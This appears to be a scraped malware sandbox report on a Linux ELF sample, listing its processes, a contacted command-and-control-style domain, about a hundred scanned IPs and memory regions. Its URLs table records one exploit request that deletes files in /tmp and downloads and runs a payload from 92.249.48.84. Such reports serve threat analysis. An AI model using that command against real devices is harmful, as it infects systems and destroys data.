Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/na.elf
|
/tmp/na.elf
|
||
|
/tmp/na.elf
|
-
|
||
|
/tmp/na.elf
|
-
|
||
|
/tmp/na.elf
|
-
|
||
|
/tmp/na.elf
|
-
|
||
|
/tmp/na.elf
|
-
|
||
|
/tmp/na.elf
|
-
|
||
|
/tmp/na.elf
|
-
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray
"Notification Area" "Area where notification icons appear"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921
statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8
12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9
12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness
of your display"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so
10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
|
||
|
/usr/bin/xfce4-panel
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
|
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925
actions "Action Buttons" "Log out, lock or other system actions"
|
||
|
/usr/bin/dbus-daemon
|
-
|
||
|
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
|
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
|
There are 12 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://upx.sf.net
|
unknown
|
 |
|
|
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+92.249.48.84/jaws;sh+/tmp/jaws
|
62.176.2.9
|
|
|
|
http://92.249.48.84/bin
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/envelope/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
plutoc2.site
|
104.248.138.112
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
202.60.94.15
|
unknown
|
Australia
|
||
|
41.182.46.2
|
unknown
|
Namibia
|
||
|
50.75.112.242
|
unknown
|
United States
|
||
|
37.187.76.116
|
unknown
|
France
|
||
|
171.193.31.139
|
unknown
|
United States
|
||
|
156.130.158.125
|
unknown
|
United States
|
||
|
223.221.152.101
|
unknown
|
China
|
||
|
156.63.125.40
|
unknown
|
United States
|
||
|
41.198.255.141
|
unknown
|
South Africa
|
||
|
71.194.240.130
|
unknown
|
United States
|
||
|
46.201.252.50
|
unknown
|
Ukraine
|
||
|
42.7.180.42
|
unknown
|
China
|
||
|
94.239.23.181
|
unknown
|
France
|
||
|
41.54.12.235
|
unknown
|
South Africa
|
||
|
191.232.45.242
|
unknown
|
Brazil
|
||
|
148.92.56.190
|
unknown
|
United States
|
||
|
123.249.35.43
|
unknown
|
China
|
||
|
172.72.181.244
|
unknown
|
United States
|
||
|
117.141.113.145
|
unknown
|
China
|
||
|
93.215.228.2
|
unknown
|
Germany
|
||
|
104.64.19.46
|
unknown
|
United States
|
||
|
114.60.73.255
|
unknown
|
China
|
||
|
42.143.115.145
|
unknown
|
China
|
||
|
76.251.40.143
|
unknown
|
United States
|
||
|
170.165.158.250
|
unknown
|
Singapore
|
||
|
123.31.53.19
|
unknown
|
Viet Nam
|
||
|
197.148.170.232
|
unknown
|
Madagascar
|
||
|
82.11.221.59
|
unknown
|
United Kingdom
|
||
|
212.214.203.191
|
unknown
|
Sweden
|
||
|
42.21.33.103
|
unknown
|
Korea Republic of
|
||
|
156.215.141.57
|
unknown
|
Egypt
|
||
|
195.89.53.245
|
unknown
|
United Kingdom
|
||
|
117.1.109.7
|
unknown
|
Viet Nam
|
||
|
210.137.46.42
|
unknown
|
Japan
|
||
|
123.214.239.154
|
unknown
|
Korea Republic of
|
||
|
156.72.230.178
|
unknown
|
United States
|
||
|
156.44.103.5
|
unknown
|
Canada
|
||
|
198.145.140.187
|
unknown
|
United States
|
||
|
47.164.75.205
|
unknown
|
United States
|
||
|
178.19.194.91
|
unknown
|
Faroe Islands
|
||
|
117.179.233.120
|
unknown
|
China
|
||
|
2.113.39.129
|
unknown
|
Italy
|
||
|
118.213.73.6
|
unknown
|
China
|
||
|
152.83.207.199
|
unknown
|
Australia
|
||
|
197.60.107.63
|
unknown
|
Egypt
|
||
|
170.9.109.249
|
unknown
|
United States
|
||
|
78.171.46.120
|
unknown
|
Turkey
|
||
|
132.37.182.26
|
unknown
|
United States
|
||
|
94.66.233.253
|
unknown
|
Greece
|
||
|
217.19.227.101
|
unknown
|
Belgium
|
||
|
165.110.52.178
|
unknown
|
United States
|
||
|
178.92.125.249
|
unknown
|
Ukraine
|
||
|
178.225.147.23
|
unknown
|
Netherlands
|
||
|
212.50.137.188
|
unknown
|
Finland
|
||
|
197.247.167.12
|
unknown
|
Morocco
|
||
|
62.82.0.222
|
unknown
|
Spain
|
||
|
133.166.17.9
|
unknown
|
Japan
|
||
|
77.36.55.194
|
unknown
|
Romania
|
||
|
212.99.45.137
|
unknown
|
France
|
||
|
117.65.71.120
|
unknown
|
China
|
||
|
114.209.227.80
|
unknown
|
China
|
||
|
156.17.237.218
|
unknown
|
Poland
|
||
|
147.29.88.216
|
unknown
|
Denmark
|
||
|
60.120.70.48
|
unknown
|
Japan
|
||
|
108.239.35.103
|
unknown
|
United States
|
||
|
223.81.247.89
|
unknown
|
China
|
||
|
68.223.74.163
|
unknown
|
United States
|
||
|
108.159.91.70
|
unknown
|
United States
|
||
|
123.87.41.92
|
unknown
|
China
|
||
|
177.130.200.180
|
unknown
|
Brazil
|
||
|
41.195.197.31
|
unknown
|
South Africa
|
||
|
197.191.38.224
|
unknown
|
Ghana
|
||
|
123.163.28.100
|
unknown
|
China
|
||
|
94.183.231.111
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
37.240.54.95
|
unknown
|
Saudi Arabia
|
||
|
2.218.141.113
|
unknown
|
United Kingdom
|
||
|
41.24.221.237
|
unknown
|
South Africa
|
||
|
13.117.171.103
|
unknown
|
United States
|
||
|
217.181.57.7
|
unknown
|
United Kingdom
|
||
|
220.129.73.139
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
117.90.111.48
|
unknown
|
China
|
||
|
176.61.179.170
|
unknown
|
Austria
|
||
|
41.92.95.76
|
unknown
|
Morocco
|
||
|
187.46.78.46
|
unknown
|
Brazil
|
||
|
156.175.120.70
|
unknown
|
Egypt
|
||
|
84.95.46.66
|
unknown
|
Israel
|
||
|
197.38.240.105
|
unknown
|
Egypt
|
||
|
5.68.209.100
|
unknown
|
United Kingdom
|
||
|
41.122.162.189
|
unknown
|
South Africa
|
||
|
136.152.48.129
|
unknown
|
United States
|
||
|
41.71.222.90
|
unknown
|
Nigeria
|
||
|
70.30.247.11
|
unknown
|
Canada
|
||
|
41.162.186.189
|
unknown
|
South Africa
|
||
|
178.230.74.165
|
unknown
|
Netherlands
|
||
|
123.143.23.81
|
unknown
|
Korea Republic of
|
||
|
155.212.202.36
|
unknown
|
United States
|
||
|
197.169.124.242
|
unknown
|
South Africa
|
||
|
81.38.229.166
|
unknown
|
Spain
|
||
|
202.132.234.64
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
172.195.226.10
|
unknown
|
Australia
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
805d000
|
page execute read
|
|
||
|
805d000
|
page execute read
|
|
||
|
8392000
|
page read and write
|
|||
|
f7f59000
|
page execute read
|
|||
|
f7f59000
|
page execute read
|
|||
|
8392000
|
page read and write
|
|||
|
805e000
|
page read and write
|
|||
|
ff8ec000
|
page read and write
|
|||
|
ff8ec000
|
page read and write
|
|||
|
805e000
|
page read and write
|